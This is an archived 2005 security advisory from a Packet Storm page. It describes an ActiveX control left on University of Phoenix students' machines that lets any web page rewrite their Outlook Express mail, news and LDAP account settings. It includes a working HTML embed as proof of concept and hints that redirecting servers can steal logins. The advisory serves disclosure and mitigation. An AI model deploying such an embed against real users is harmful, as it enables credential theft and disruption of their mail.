what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

uofpConfig.txt

uofpConfig.txt
Posted Feb 1, 2005
Authored by Adam Baldwin | Site evilpacket.net

An active-x control used to set up e-mail, nntp, and ldap accounts in Outlook Express for the University of Phoenix allows for later account manipulation.

tags | exploit, activex
SHA-256 | 4bca6a33736e5903a701811c2b98fceeb18af1da5f873243b6df0556d9db116d

uofpConfig.txt

Change Mirror Download
 * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

University of Phoenix Outlook Express Unauthorized Configuration Manipulation
Vendor Homepage: https://www.phoenix.edu

Discovered by: Adam Baldwin (evilpacket@ngenuity-is.com)
www.evilpacket.net\advisories\EP-000-0002.html

Discovery Date: 1.17.2005

File Name: PhxStudent15.ocx
Vulnerable Version: 2.00.0001

Overview:
PhxStudent15.ocx is an activex control used to setup e-mail / NNTP and
LDAP accounts in Outlook Express. This control remains on the users
system long after the setup process has completed. This activex
control can be used to manipulate the users account settings (imap /
smtp / nntp / ldap).

The following is an example of how to embed this control into a
website with the proper param's. Note the account is only 'modified'
if the "Program" param remains the same, which is not difficult. Any
of the other settings can be modified to cause any number of attacks
from denial of service to theft of login credentials, (be inventive
:-)

Example:
<HTML>
<BODY>
<OBJECT classid=CLSID:A82C3A33-5C0E-466C-B020-71585433A7E4
codeBase="PhxStudent15.ocx">
<PARAM NAME="Program" VALUE="BSIT">
<PARAM NAME="GroupID" VALUE="BSAF008HU0">
<PARAM NAME="CourseID" VALUE="DBM/380">
<PARAM NAME="StartDate" VALUE="01/20/2005">
<PARAM NAME="Path" VALUE="">
<PARAM NAME="DNS" VALUE="bsit2.phoenix.edu">
<PARAM NAME="Student" VALUE="Y">
<PARAM NAME="FName" VALUE="FIRSTNAME">
<PARAM NAME="LName" VALUE="LASTNAME">
<PARAM NAME="Alias" VALUE="username">
<PARAM NAME="ErrorPath" VALUE="">
<PARAM NAME="CourseListPage" VALUE="">
<PARAM NAME="Account2000YN" VALUE="Y">
<PARAM NAME="NNTPUserNamePrefix" VALUE="ols\">
<PARAM NAME="EmailSuffix" VALUE="@email.uophx.edu">
<PARAM NAME="LDAPServer" VALUE="ldap.uophx.edu">
<PARAM NAME="MailoutLocation" VALUE="emailout.phoenix.edu">
<PARAM NAME="EmailLocation" VALUE="email11.phoenix.edu">
<PARAM NAME="FlexnetEmailLocation" VALUE="email11.phoenix.edu">
<PARAM NAME="LDAPUserName" VALUE="">
<PARAM NAME="ProgramSuffix" VALUE="_">
</OBJECT>
</BODY>
</HTML>

Mitigation:
The University of Phoenix has been contacted but no response has been
received. I would recommend that students remove this activex control
and only allow it to be installed while registering for classes.

Notes:
At this time further exploitation does not appear possible, although
on the following platform (with modification of the params) would
crash IE after the ocx was loaded and crashed 3 times in the same
browser window, which begs further research.

Platform: Windows XP SP2, IE 6.0.2900.2180.xpsp2_rtm.040803-2158

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close